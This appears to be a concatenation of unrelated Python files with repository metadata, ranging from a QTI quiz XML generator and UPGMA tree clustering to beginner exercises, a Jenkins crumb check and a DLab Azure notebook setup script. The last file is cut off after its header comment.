'short_answer_question', 'multiple_answers_question'):
item_metadata = ITEM_METADATA_MCTF_SHORTANS_MULTANS_NUM
original_answer_ids = ','.join(f'text2qti_choice_{c.id}' for c in question.choices)
elif question.type == 'numerical_question':
item_metadata = ITEM_METADATA_MCTF_SHORTANS_MULTANS_NUM
original_answer_ids = f'text2qti_numerical_{question.id}'
elif question.type == 'essay_question':
item_metadata = ITEM_METADATA_ESSAY
original_answer_ids = f'text2qti_essay_{question.id}'
elif question.type == 'file_upload_question':
item_metadata = ITEM_METADATA_UPLOAD
original_answer_ids = f'text2qti_upload_{question.id}'
else:
raise ValueError
#Type Change for Schoology CC Import
if question.type == 'multiple_choice_question':
typechange = 'cc.multiple_choice.v0p1'
elif question.type == 'true_false_question':
typechange = 'cc.true_false.v0p1'
elif question.type == 'short_answer_question':
typechange = 'cc.fib.v0p1'
elif question.type == 'multiple_answers_question':
typechange = 'cc.multiple_response.v0p1'
elif question.type == 'essay_question':
typechange = 'cc.essay.v0p1'
else:
typechange = question.type
xml.append(item_metadata.format(question_type=typechange,
points_possible=question.points_possible,
original_answer_ids=original_answer_ids,
assessment_question_identifierref=f'text2qti_question_ref_{question.id}'))
if question.type in ('true_false_question', 'multiple_choice_question', 'multiple_answers_question'):
if question.type in ('true_false_question', 'multiple_choice_question'):
item_presentation_choice = ITEM_PRESENTATION_MCTF_CHOICE
item_presentation = ITEM_PRESENTATION_MCTF
elif question.type == 'multiple_answers_question':
item_presentation_choice = ITEM_PRESENTATION_MULTANS_CHOICE
item_presentation = ITEM_PRESENTATION_MULTANS
else:
raise ValueError
choices = '\n'.join(item_presentation_choice.format(ident=f'text2qti_choice_{c.id}', choice_html_xml=c.choice_html_xml)
for c in question.choices)
xml.append(item_presentation.format(question_html_xml=question.question_html_xml, choices=choices))
elif question.type == 'short_answer_question':
xml.append(ITEM_PRESENTATION_SHORTANS.format(question_html_xml=question.question_html_xml))
elif question.type == 'numerical_question':
xml.append(ITEM_PRESENTATION_NUM.format(question_html_xml=question.question_html_xml))
elif question.type == 'essay_question':
xml.append(ITEM_PRESENTATION_ESSAY.format(question_html_xml=question.question_html_xml))
elif question.type == 'file_upload_question':
xml.append(ITEM_PRESENTATION_UPLOAD.format(question_html_xml=question.question_html_xml))
else:
raise ValueError
if question.type in ('true_false_question', 'multiple_choice_question'):
correct_choice = None
for choice in question.choices:
if choice.correct:
correct_choice = choice
break
if correct_choice is None:
raise TypeError
resprocessing = []
resprocessing.append(ITEM_RESPROCESSING_START)
if question.feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK)
for choice in question.choices:
if choice.feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_MCTF_CHOICE_FEEDBACK.format(ident=f'text2qti_choice_{choice.id}'))
if question.correct_feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_MCTF_SET_CORRECT_WITH_FEEDBACK.format(ident=f'text2qti_choice_{correct_choice.id}'))
else:
resprocessing.append(ITEM_RESPROCESSING_MCTF_SET_CORRECT_NO_FEEDBACK.format(ident=f'text2qti_choice_{correct_choice.id}'))
if question.incorrect_feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK)
resprocessing.append(ITEM_RESPROCESSING_END)
xml.extend(resprocessing)
elif question.type == 'short_answer_question':
resprocessing = []
resprocessing.append(ITEM_RESPROCESSING_START)
if question.feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_SHORTANS_GENERAL_FEEDBACK)
for choice in question.choices:
if choice.feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_SHORTANS_CHOICE_FEEDBACK.format(ident=f'text2qti_choice_{choice.id}', answer_xml=choice.choice_xml))
varequal = []
for choice in question.choices:
varequal.append(ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_VAREQUAL.format(answer_xml=choice.choice_xml))
if question.correct_feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_WITH_FEEDBACK.format(varequal='\n'.join(varequal)))
else:
resprocessing.append(ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_NO_FEEDBACK.format(varequal='\n'.join(varequal)))
if question.incorrect_feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_SHORTANS_INCORRECT_FEEDBACK)
resprocessing.append(ITEM_RESPROCESSING_END)
xml.extend(resprocessing)
elif question.type == 'multiple_answers_question':
resprocessing = []
resprocessing.append(ITEM_RESPROCESSING_START)
if question.feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_MULTANS_GENERAL_FEEDBACK)
for choice in question.choices:
if choice.feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_MULTANS_CHOICE_FEEDBACK.format(ident=f'text2qti_choice_{choice.id}'))
varequal = []
for choice in question.choices:
if choice.correct:
varequal.append(ITEM_RESPROCESSING_MULTANS_SET_CORRECT_VAREQUAL_CORRECT.format(ident=f'text2qti_choice_{choice.id}'))
else:
varequal.append(ITEM_RESPROCESSING_MULTANS_SET_CORRECT_VAREQUAL_INCORRECT.format(ident=f'text2qti_choice_{choice.id}'))
if question.correct_feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_MULTANS_SET_CORRECT_WITH_FEEDBACK.format(varequal='\n'.join(varequal)))
else:
resprocessing.append(ITEM_RESPROCESSING_MULTANS_SET_CORRECT_NO_FEEDBACK.format(varequal='\n'.join(varequal)))
if question.incorrect_feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_MULTANS_INCORRECT_FEEDBACK)
resprocessing.append(ITEM_RESPROCESSING_END)
xml.extend(resprocessing)
elif question.type == 'numerical_question':
xml.append(ITEM_RESPROCESSING_START)
if question.feedback_raw is not None:
xml.append(ITEM_RESPROCESSING_NUM_GENERAL_FEEDBACK)
if question.correct_feedback_raw is None:
if question.numerical_exact is None:
item_resprocessing_num_set_correct = ITEM_RESPROCESSING_NUM_RANGE_SET_CORRECT_NO_FEEDBACK
else:
item_resprocessing_num_set_correct = ITEM_RESPROCESSING_NUM_EXACT_SET_CORRECT_NO_FEEDBACK
else:
if question.numerical_exact is None:
item_resprocessing_num_set_correct = ITEM_RESPROCESSING_NUM_RANGE_SET_CORRECT_WITH_FEEDBACK
else:
item_resprocessing_num_set_correct = ITEM_RESPROCESSING_NUM_EXACT_SET_CORRECT_WITH_FEEDBACK
xml.append(item_resprocessing_num_set_correct.format(num_min=question.numerical_min_html_xml,
num_exact=question.numerical_exact_html_xml,
num_max=question.numerical_max_html_xml))
if question.incorrect_feedback_raw is not None:
xml.append(ITEM_RESPROCESSING_NUM_INCORRECT_FEEDBACK)
xml.append(ITEM_RESPROCESSING_END)
elif question.type == 'essay_question':
xml.append(ITEM_RESPROCESSING_START)
xml.append(ITEM_RESPROCESSING_ESSAY)
if question.feedback_raw is not None:
xml.append(ITEM_RESPROCESSING_ESSAY_GENERAL_FEEDBACK)
xml.append(ITEM_RESPROCESSING_END)
elif question.type == 'file_upload_question':
xml.append(ITEM_RESPROCESSING_START)
if question.feedback_raw is not None:
xml.append(ITEM_RESPROCESSING_UPLOAD_GENERAL_FEEDBACK)
xml.append(ITEM_RESPROCESSING_END)
else:
raise ValueError
if question.type in ('true_false_question', 'multiple_choice_question',
'short_answer_question', 'multiple_answers_question',
'numerical_question', 'essay_question', 'file_upload_question'):
if question.feedback_raw is not None:
xml.append(ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_GENERAL.format(feedback=question.feedback_html_xml))
if question.correct_feedback_raw is not None:
xml.append(ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_CORRECT.format(feedback=question.correct_feedback_html_xml))
if question.incorrect_feedback_raw is not None:
xml.append(ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_INCORRECT.format(feedback=question.incorrect_feedback_html_xml))
if question.type in ('true_false_question', 'multiple_choice_question',
'short_answer_question', 'multiple_answers_question'):
for choice in question.choices:
if choice.feedback_raw is not None:
xml.append(ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_INDIVIDUAL.format(ident=f'text2qti_choice_{choice.id}',
feedback=choice.feedback_html_xml))
xml.append(END_ITEM)
xml.append(AFTER_ITEMS)
return ''.join(xml)
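# Minimal usage sketch (hypothetical: the Quiz object is built by text2cc's
# parser in .quiz, and its actual constructor may differ):
#
#     quiz = Quiz(source_text)
#     xml = assessment(quiz=quiz,
#                      assessment_identifier='text2qti_assessment_1',
#                      title_xml='Sample Quiz')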
fc0c40028b9c4945addfec469dd5871c8f82e05b | 52 | py | Python | gemucator/__init__.py | philipwfowler/genucator | d43a79afe1aa81ca24d7ab4370ed230e08aa89bf | ["MIT"] | null | null | null | gemucator/__init__.py | philipwfowler/genucator | d43a79afe1aa81ca24d7ab4370ed230e08aa89bf | ["MIT"] | null | null | null | gemucator/__init__.py | philipwfowler/genucator | d43a79afe1aa81ca24d7ab4370ed230e08aa89bf | ["MIT"] | null | null | null
#! /usr/bin/env python
from .core import gemucator
fc109f21dbb2efc4b477a59e275c911d6c56316e | 221 | py | Python | ABC/abc001-abc050/abc007/b.py | KATO-Hiro/AtCoder | cbbdb18e95110b604728a54aed83a6ed6b993fde | ["CC0-1.0"] | 2 | 2020-06-12T09:54:23.000Z | 2021-05-04T01:34:07.000Z | ABC/abc001-abc050/abc007/b.py | KATO-Hiro/AtCoder | cbbdb18e95110b604728a54aed83a6ed6b993fde | ["CC0-1.0"] | 961 | 2020-06-23T07:26:22.000Z | 2022-03-31T21:34:52.000Z | ABC/abc001-abc050/abc007/b.py | KATO-Hiro/AtCoder | cbbdb18e95110b604728a54aed83a6ed6b993fde | ["CC0-1.0"] | null | null | null
# -*- coding: utf-8 -*-
def main():
a = input()
# See:
# https://www.slideshare.net/chokudai/abc007
if a == 'a':
print('-1')
else:
print('a')
if __name__ == '__main__':
main()
fc12305fff510e126657094db88dd638e8718e01 | 1,042 | py | Python | part01_basic/for_while_loop.py | ApprenticeOne/python_learn | 2433726b3f164526e8a8fa18739854e052d76a2e | ["MIT"] | null | null | null | part01_basic/for_while_loop.py | ApprenticeOne/python_learn | 2433726b3f164526e8a8fa18739854e052d76a2e | ["MIT"] | null | null | null | part01_basic/for_while_loop.py | ApprenticeOne/python_learn | 2433726b3f164526e8a8fa18739854e052d76a2e | ["MIT"] | null | null | null
import random
from math import sqrt
sum = 0
for x in range(101):
sum += x
print(sum)
'''
range(101)       0-100, 101 numbers in total
range(1,101)     1-100
range(1,101,2)   odd numbers between 1 and 100, step 2
range(100,0,-2)  even numbers between 100 and 0, step -2
'''
sum = 0
for x in range(100, 0, -2):
sum += x
print(sum)
# while
# random number between 0 and 100
answer = random.randint(0, 100)
count = 0
while True:
count += 1
number = int(input("Please enter the number: "))
    if number < answer:
        print("guess larger")
    elif number > answer:
        print("guess smaller")
    else:
        print("right")
        print('you took %d tries to get the right answer' % count)
        break
for i in range(1, 10):
for j in range(1, i + 1):
print('%d*%d=%d' % (i, j, i * j), end='\t')
print()
# read a positive integer and test whether it is prime
num = int(input('Please enter a positive integer: '))
end = int(sqrt(num))
is_prime = True
# why stop at sqrt(num): if the number has a factor smaller than its square root,
# it must also have a matching factor larger than the square root
for x in range(2, end + 1):
if num % x == 0:
is_prime = False
break
if is_prime and num != 1:
    print('%d is prime' % num)
else:
    print('%d is not prime' % num)
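# The same square-root idea wrapped in a reusable function (a sketch; not part
# of the original exercise):
def is_prime_num(n):
    if n < 2:
        return False
    for factor in range(2, int(sqrt(n)) + 1):
        if n % factor == 0:
            return False
    return True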
fc1fa639ebbd112d3143f8455e253cf35ff2e2c9 | 1,033 | py | Python | src/main/resources/scripts/crumbDiag.py | cam-laf/vectorcast-execution-plugin | fd54e8580886084d040d21fa809be8a609d44d8e | ["MIT"] | 4 | 2019-06-28T22:46:06.000Z | 2020-05-28T08:53:37.000Z | src/main/resources/scripts/crumbDiag.py | cam-laf/vectorcast-execution-plugin | fd54e8580886084d040d21fa809be8a609d44d8e | ["MIT"] | 18 | 2018-09-26T15:32:11.000Z | 2021-10-01T21:57:14.000Z | src/main/resources/scripts/crumbDiag.py | cam-laf/vectorcast-execution-plugin | fd54e8580886084d040d21fa809be8a609d44d8e | ["MIT"] | 11 | 2017-03-19T18:37:16.000Z | 2020-04-06T19:46:09.000Z
from __future__ import print_function
import requests
import sys
import os
verbose=True
try:
username=os.environ['USERNAME']
password=os.environ['PASSWORD']
except KeyError:
    print("Crumb Diagnostic requires USERNAME/PASSWORD to be set as environment variables")
sys.exit(-1)
jenkins_url=os.environ['JENKINS_URL']
url = jenkins_url + 'crumbIssuer/api/xml?xpath=concat(//crumbRequestField,":",//crumb)'
print(url)
if username:
crumb = requests.get(url, auth=(username, password))
if crumb.status_code == 200:
crumb_headers = dict()
crumb_headers[crumb.text.split(":")[0]] = crumb.text.split(":")[1]
if verbose:
print("Got crumb: %s" % crumb.text)
else:
print("Failed to get crumb")
print("\nYou may need to enable \"Prevent Cross Site Request Forgery exploits\" from:")
print("Manage Jenkins > Configure Global Security > CSRF Protection and select the appropriate Crumb Algorithm")
print(jenkins_url + "/configureSecurity")
sys.exit(-1)
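# A fetched crumb is meant to be echoed back on state-changing requests, e.g.
# (hypothetical job name):
# requests.post(jenkins_url + 'job/example/build', auth=(username, password),
#               headers=crumb_headers)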
fc2f8d6fdf5321bc7fa432fe83690f0311e43ce9 | 303 | py | Python | git_operation.py | zerzerzerz/Computer-Virus | 4a3125b45e0e4210fb1b8c970a0d6c6bde77f2e8 | ["MIT"] | null | null | null | git_operation.py | zerzerzerz/Computer-Virus | 4a3125b45e0e4210fb1b8c970a0d6c6bde77f2e8 | ["MIT"] | null | null | null | git_operation.py | zerzerzerz/Computer-Virus | 4a3125b45e0e4210fb1b8c970a0d6c6bde77f2e8 | ["MIT"] | null | null | null
import os
commit_string = "选择data的前多少个维度参与训练"  # "how many leading dimensions of the data to use for training"
not_add = ['results', 'data', 'weights']
for item in os.listdir():
if item in not_add:
# print(item)
continue
else:
os.system(f"git add {item}")
os.system(f'git commit -m "{commit_string}"')
os.system("git push origin main") | 25.25 | 45 | 0.636964 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 155 | 0.471125 |
fc3188873ff10721356aeaf7e965132781c78f98 | 793 | py | Python | level_one/strings.py | jameskzhao/python36 | 855e8a6e164065702efa7773da1f089454fdcbcc | ["Apache-2.0"] | null | null | null | level_one/strings.py | jameskzhao/python36 | 855e8a6e164065702efa7773da1f089454fdcbcc | ["Apache-2.0"] | null | null | null | level_one/strings.py | jameskzhao/python36 | 855e8a6e164065702efa7773da1f089454fdcbcc | ["Apache-2.0"] | null | null | null
#Basics
a = "hello"
a += " I'm a dog"
print(a)
print(len(a))
print(a[1:]) #Output: ello I'm a dog
print(a[:5]) #Output: hello(index 5 is not included)
print(a[2:5])#Output: llo(index 2 is included)
print(a[::2])#Step size
#string is immutable so you can't assign a[1]= b
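#to "change" a character, build a new string instead:
y = 'b' + a[1:] #replaces the first character
print(y)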
x = a.upper()
print(x)
x = a.capitalize()
print(x)
x = a.split('e')
print(x)
x = a.split() #splits the string by space
print(x)
x = a.strip() #removes any whitespace from beginning or the end
print(x)
x = a.replace('l','xxx')
print(x)
x = "Insert another string here: {}".format('insert me!')
x = "Item One: {} Item Two: {}".format('dog', 'cat')
print(x)
x = "Item One: {m} Item Two: {m}".format(m='dog', n='cat')
print(x)
#command-line string input
print("Enter your name:")
x = input()
print("Hello: {}".format(x)) | 22.027778 | 63 | 0.631778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 442 | 0.557377 |
fc3d1481782a2c4ff97885d3937f7846223c55ab | 1,082 | py | Python | setup.py | sturmianseq/observed | d99fb99ff2a470a86efb2763685e8e2c021e799f | ["MIT"] | 33 | 2015-04-29T08:11:42.000Z | 2022-02-01T16:50:25.000Z | setup.py | sturmianseq/observed | d99fb99ff2a470a86efb2763685e8e2c021e799f | ["MIT"] | 15 | 2015-02-04T15:11:17.000Z | 2022-01-26T19:58:29.000Z | setup.py | sturmianseq/observed | d99fb99ff2a470a86efb2763685e8e2c021e799f | ["MIT"] | 6 | 2017-06-11T19:40:31.000Z | 2021-08-05T07:57:28.000Z
import re
import setuptools
README_FILENAME = "README.md"
VERSION_FILENAME = "observed.py"
VERSION_RE = r"^__version__ = ['\"]([^'\"]*)['\"]"
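# e.g. VERSION_RE matches a line like: __version__ = "1.2.3"  ->  group(1) == "1.2.3"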
# Get version information
with open(VERSION_FILENAME, "r") as version_file:
mo = re.search(VERSION_RE, version_file.read(), re.M)
if mo:
version = mo.group(1)
else:
msg = "Unable to find version string in %s." % (version_file,)
raise RuntimeError(msg)
# Get description information
with open(README_FILENAME, "r") as description_file:
long_description = description_file.read()
setuptools.setup(
name="observed",
version=version,
author="Daniel Sank",
author_email="sank.daniel@gmail.com",
description="Observer pattern for functions and bound methods",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/DanielSank/observed",
py_modules=["observed"],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
)
fc3e56f1b6dc2446fe20c8456364bfd95e849dd0 | 7,538 | py | Python | infrastructure-provisioning/src/general/scripts/azure/common_notebook_configure_dataengine.py | DmytroLiaskovskyi/incubator-dlab | af995e98b3b3cf526fb9741a3e5117dd1e04f3aa | ["Apache-2.0"] | null | null | null | infrastructure-provisioning/src/general/scripts/azure/common_notebook_configure_dataengine.py | DmytroLiaskovskyi/incubator-dlab | af995e98b3b3cf526fb9741a3e5117dd1e04f3aa | ["Apache-2.0"] | null | null | null | infrastructure-provisioning/src/general/scripts/azure/common_notebook_configure_dataengine.py | DmytroLiaskovskyi/incubator-dlab | af995e98b3b3cf526fb9741a3e5117dd1e04f3aa | ["Apache-2.0"] | null | null | null
#!/usr/bin/python
# *****************************************************************************
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# ******************************************************************************
import logging
import json
import sys
from dlab.fab import *
from dlab.meta_lib import *
from dlab.actions_lib import *
import os
import uuid
if __name__ == "__main__":
local_log_filename = "{}_{}_{}.log".format(os.environ['conf_resource'], os.environ['project_name'],
os.environ['request_id'])
local_log_filepath = "/logs/" + os.environ['conf_resource'] + "/" + local_log_filename
logging.basicConfig(format='%(levelname)-8s [%(asctime)s] %(message)s',
level=logging.DEBUG,
filename=local_log_filepath)
try:
# generating variables dictionary
print('Generating infrastructure names and tags')
notebook_config = dict()
try:
notebook_config['exploratory_name'] = os.environ['exploratory_name'].replace('_', '-')
except:
notebook_config['exploratory_name'] = ''
try:
notebook_config['computational_name'] = os.environ['computational_name'].replace('_', '-')
except:
notebook_config['computational_name'] = ''
notebook_config['service_base_name'] = os.environ['conf_service_base_name']
notebook_config['resource_group_name'] = os.environ['azure_resource_group_name']
notebook_config['region'] = os.environ['azure_region']
notebook_config['user_name'] = os.environ['edge_user_name'].replace('_', '-')
notebook_config['project_name'] = os.environ['project_name'].replace('_', '-')
notebook_config['project_tag'] = os.environ['project_name'].replace('_', '-')
notebook_config['endpoint_tag'] = os.environ['endpoint_name'].replace('_', '-')
notebook_config['cluster_name'] = notebook_config['service_base_name'] + '-' + notebook_config['project_name'] + \
'-de-' + notebook_config['exploratory_name'] + '-' + \
notebook_config['computational_name']
notebook_config['master_node_name'] = notebook_config['cluster_name'] + '-m'
notebook_config['slave_node_name'] = notebook_config['cluster_name'] + '-s'
notebook_config['notebook_name'] = os.environ['notebook_instance_name']
notebook_config['key_path'] = os.environ['conf_key_dir'] + '/' + os.environ['conf_key_name'] + '.pem'
notebook_config['dlab_ssh_user'] = os.environ['conf_os_user']
notebook_config['instance_count'] = int(os.environ['dataengine_instance_count'])
try:
notebook_config['spark_master_ip'] = AzureMeta().get_private_ip_address(
notebook_config['resource_group_name'], notebook_config['master_node_name'])
notebook_config['notebook_ip'] = AzureMeta().get_private_ip_address(
notebook_config['resource_group_name'], notebook_config['notebook_name'])
except Exception as err:
print('Error: {0}'.format(err))
sys.exit(1)
notebook_config['spark_master_url'] = 'spark://{}:7077'.format(notebook_config['spark_master_ip'])
except Exception as err:
for i in range(notebook_config['instance_count'] - 1):
slave_name = notebook_config['slave_node_name'] + '{}'.format(i+1)
AzureActions().remove_instance(notebook_config['resource_group_name'], slave_name)
AzureActions().remove_instance(notebook_config['resource_group_name'], notebook_config['master_node_name'])
append_result("Failed to generate infrastructure names", str(err))
sys.exit(1)
try:
logging.info('[INSTALLING KERNELS INTO SPECIFIED NOTEBOOK]')
print('[INSTALLING KERNELS INTO SPECIFIED NOTEBOOK]')
params = "--cluster_name {0} --spark_version {1} --hadoop_version {2} --os_user {3} --spark_master {4}" \
" --keyfile {5} --notebook_ip {6} --datalake_enabled {7} --spark_master_ip {8}".\
format(notebook_config['cluster_name'], os.environ['notebook_spark_version'],
os.environ['notebook_hadoop_version'], notebook_config['dlab_ssh_user'],
notebook_config['spark_master_url'], notebook_config['key_path'], notebook_config['notebook_ip'],
os.environ['azure_datalake_enable'], notebook_config['spark_master_ip'])
try:
local("~/scripts/{}_{}.py {}".format(os.environ['application'], 'install_dataengine_kernels', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
for i in range(notebook_config['instance_count'] - 1):
slave_name = notebook_config['slave_node_name'] + '{}'.format(i+1)
AzureActions().remove_instance(notebook_config['resource_group_name'], slave_name)
AzureActions().remove_instance(notebook_config['resource_group_name'], notebook_config['master_node_name'])
append_result("Failed installing Dataengine kernels.", str(err))
sys.exit(1)
try:
logging.info('[UPDATING SPARK CONFIGURATION FILES ON NOTEBOOK]')
print('[UPDATING SPARK CONFIGURATION FILES ON NOTEBOOK]')
params = "--hostname {0} " \
"--keyfile {1} " \
"--os_user {2} " \
"--cluster_name {3} " \
.format(notebook_config['notebook_ip'],
notebook_config['key_path'],
notebook_config['dlab_ssh_user'],
notebook_config['cluster_name'])
try:
local("~/scripts/{0}.py {1}".format('common_configure_spark', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
for i in range(notebook_config['instance_count'] - 1):
slave_name = notebook_config['slave_node_name'] + '{}'.format(i+1)
AzureActions().remove_instance(notebook_config['resource_group_name'], slave_name)
AzureActions().remove_instance(notebook_config['resource_group_name'], notebook_config['master_node_name'])
append_result("Failed to configure Spark.", str(err))
sys.exit(1)
try:
with open("/root/result.json", 'w') as result:
res = {"notebook_name": notebook_config['notebook_name'],
"Action": "Configure notebook server"}
print(json.dumps(res))
result.write(json.dumps(res))
except:
print("Failed writing results.")
sys.exit(0)
| 51.986207 | 122 | 0.628549 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,322 | 0.4407 |
fc412db90075a83ae4e5731ee32b0fb7611791ff | 6034 | py | Python | src/cogent3/cluster/UPGMA.py | u6052029/cogent3 | ca0efcb7f60b715bcbfbecd924cdb98a53cefe20 | ["BSD-3-Clause"] | null | null | null | src/cogent3/cluster/UPGMA.py | u6052029/cogent3 | ca0efcb7f60b715bcbfbecd924cdb98a53cefe20 | ["BSD-3-Clause"] | null | null | null | src/cogent3/cluster/UPGMA.py | u6052029/cogent3 | ca0efcb7f60b715bcbfbecd924cdb98a53cefe20 | ["BSD-3-Clause"] | null | null | null | #!/usr/bin/env python
"""Functions to cluster using UPGMA
upgma takes a dictionary of pair tuples mapped to distances as input.
UPGMA_cluster takes an array and a list of PhyloNode objects corresponding
to the array as input. Can also generate this type of input from a DictArray using
the inputs_from_dict_array function.
Both return a PhyloNode object of the UPGMA cluster.
"""
import numpy
from numpy import argmin, average, diag, ravel, take
from cogent3.core.tree import PhyloNode
from cogent3.util.dict_array import DictArray
__author__ = "Catherine Lozupone"
__copyright__ = "Copyright 2007-2020, The Cogent Project"
__credits__ = ["Catherine Lozuopone", "Rob Knight", "Peter Maxwell"]
__license__ = "BSD-3"
__version__ = "2020.7.2a"
__maintainer__ = "Catherine Lozupone"
__email__ = "lozupone@colorado.edu"
__status__ = "Production"
numerictypes = numpy.core.numerictypes.sctype2char
Float = numerictypes(float)
BIG_NUM = 1e305
def upgma(pairwise_distances):
"""Uses the UPGMA algorithm to cluster sequences
pairwise_distances: a dictionary with pair tuples mapped to a distance
returns a PhyloNode object of the UPGMA cluster
"""
darr = DictArray(pairwise_distances)
matrix_a, node_order = inputs_from_dict_array(darr)
tree = UPGMA_cluster(matrix_a, node_order, BIG_NUM)
index = 0
for node in tree.traverse():
if not node.parent:
node.name = "root"
elif not node.name:
node.name = "edge." + str(index)
index += 1
return tree
def find_smallest_index(matrix):
"""returns the index of the smallest element in a numpy array
    for UPGMA clustering, elements on the diagonal should first be
    substituted with a very large number so that they are always
    larger than the rest of the values in the array."""
# get the shape of the array as a tuple (e.g. (3,3))
shape = matrix.shape
# turn into a 1 by x array and get the index of the lowest number
matrix1D = ravel(matrix)
lowest_index = argmin(matrix1D)
# convert the lowest_index derived from matrix1D to one for the original
# square matrix and return
row_len = shape[0]
return divmod(lowest_index, row_len)
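# Illustrative sketch (not part of the original module): with the diagonal
# already flooded, numpy.array([[BIG_NUM, 4.0], [4.0, BIG_NUM]]) ravels to
# [BIG_NUM, 4.0, 4.0, BIG_NUM]; argmin picks flat index 1, and divmod(1, 2)
# maps it back to the square-matrix coordinates (0, 1).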
def condense_matrix(matrix, smallest_index, large_value):
"""converges the rows and columns indicated by smallest_index
Smallest index is returned from find_smallest_index.
For both the rows and columns, the values for the two indices are
averaged. The resulting vector replaces the first index in the array
and the second index is replaced by an array with large numbers so that
it is never chosen again with find_smallest_index.
"""
first_index, second_index = smallest_index
# get the rows and make a new vector that has their average
rows = take(matrix, smallest_index, 0)
new_vector = average(rows, 0)
# replace info in the row and column for first index with new_vector
matrix[first_index] = new_vector
matrix[:, first_index] = new_vector
# replace the info in the row and column for the second index with
# high numbers so that it is ignored
matrix[second_index] = large_value
matrix[:, second_index] = large_value
return matrix
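# Worked sketch (illustrative): condensing a 3x3 matrix at smallest_index
# (0, 1) overwrites row/column 0 with the element-wise average of rows 0
# and 1, then floods row/column 1 with large_value so find_smallest_index
# can never pick it again.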
def condense_node_order(matrix, smallest_index, node_order):
"""condenses two nodes in node_order based on smallest_index info
This function is used to create a tree while condensing a matrix
with the condense_matrix function. The smallest_index is retrieved
with find_smallest_index. The first index is replaced with a node object
that combines the two nodes corresponding to the indices in node order.
The second index in smallest_index is replaced with None.
Also sets the branch length of the nodes to 1/2 of the distance between
the nodes in the matrix"""
index1, index2 = smallest_index
node1 = node_order[index1]
node2 = node_order[index2]
# get the distance between the nodes and assign 1/2 the distance to the
    # length property of each node
distance = matrix[index1, index2]
nodes = [node1, node2]
d = distance / 2.0
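    # d is the ultrametric height of the new parent node; for an internal
    # child, subtracting the child's recorded TipLength converts that height
    # into the branch length from the child up to the new parent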
for n in nodes:
if n.children:
n.length = d - n.children[0].TipLength
else:
n.length = d
n.TipLength = d
# combine the two nodes into a new PhyloNode object
new_node = PhyloNode()
new_node.children.append(node1)
new_node.children.append(node2)
node1.parent = new_node
node2.parent = new_node
# replace the object at index1 with the combined node
node_order[index1] = new_node
# replace the object at index2 with None
node_order[index2] = None
return node_order
def UPGMA_cluster(matrix, node_order, large_number):
"""cluster with UPGMA
matrix is a numpy array.
node_order is a list of PhyloNode objects corresponding to the matrix.
large_number will be assigned to the matrix during the process and
should be much larger than any value already in the matrix.
WARNING: Changes matrix in-place.
WARNING: Expects matrix to already have diagonals assigned to large_number
before this function is called.
"""
num_entries = len(node_order)
tree = None
for i in range(num_entries - 1):
smallest_index = find_smallest_index(matrix)
index1, index2 = smallest_index
# if smallest_index is on the diagonal set the diagonal to large_number
if index1 == index2:
matrix[diag([True] * len(matrix))] = large_number
smallest_index = find_smallest_index(matrix)
row_order = condense_node_order(matrix, smallest_index, node_order)
matrix = condense_matrix(matrix, smallest_index, large_number)
tree = node_order[smallest_index[0]]
return tree
def inputs_from_dict_array(darr):
"""makes inputs for UPGMA_cluster from a DictArray object
"""
darr.array += numpy.eye(darr.shape[0]) * BIG_NUM
nodes = list(map(PhyloNode, darr.keys()))
return darr.array, nodes
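# Minimal usage sketch (added for illustration; the three-taxon distances are
# made up). Per the module docstring, upgma() takes a dict of pair tuples
# mapped to distances; both orderings of each pair are supplied so the
# resulting matrix is symmetric.
if __name__ == "__main__":
    example_dists = {
        ("a", "b"): 4.0, ("b", "a"): 4.0,
        ("a", "c"): 8.0, ("c", "a"): 8.0,
        ("b", "c"): 8.0, ("c", "b"): 8.0,
    }
    # a PhyloNode renders as a newick string when printed
    print(upgma(example_dists))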
| 36.569697 | 82 | 0.716937 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,189 | 0.528505 |
fc416ffd2f7c1bbdb707cd0d27fb98dd3ff367ba | 881 | py | Python | src/python/make_store_entry.py | kf7lsu/RegfileCompiler-public | 0845f1458137cef06d584047bb4287a72c6afbab | ["Apache-2.0"] | null | null | null | src/python/make_store_entry.py | kf7lsu/RegfileCompiler-public | 0845f1458137cef06d584047bb4287a72c6afbab | ["Apache-2.0"] | null | null | null | src/python/make_store_entry.py | kf7lsu/RegfileCompiler-public | 0845f1458137cef06d584047bb4287a72c6afbab | ["Apache-2.0"] | null | null | null | #this code will generate the structural verilog for a single entry in the register file
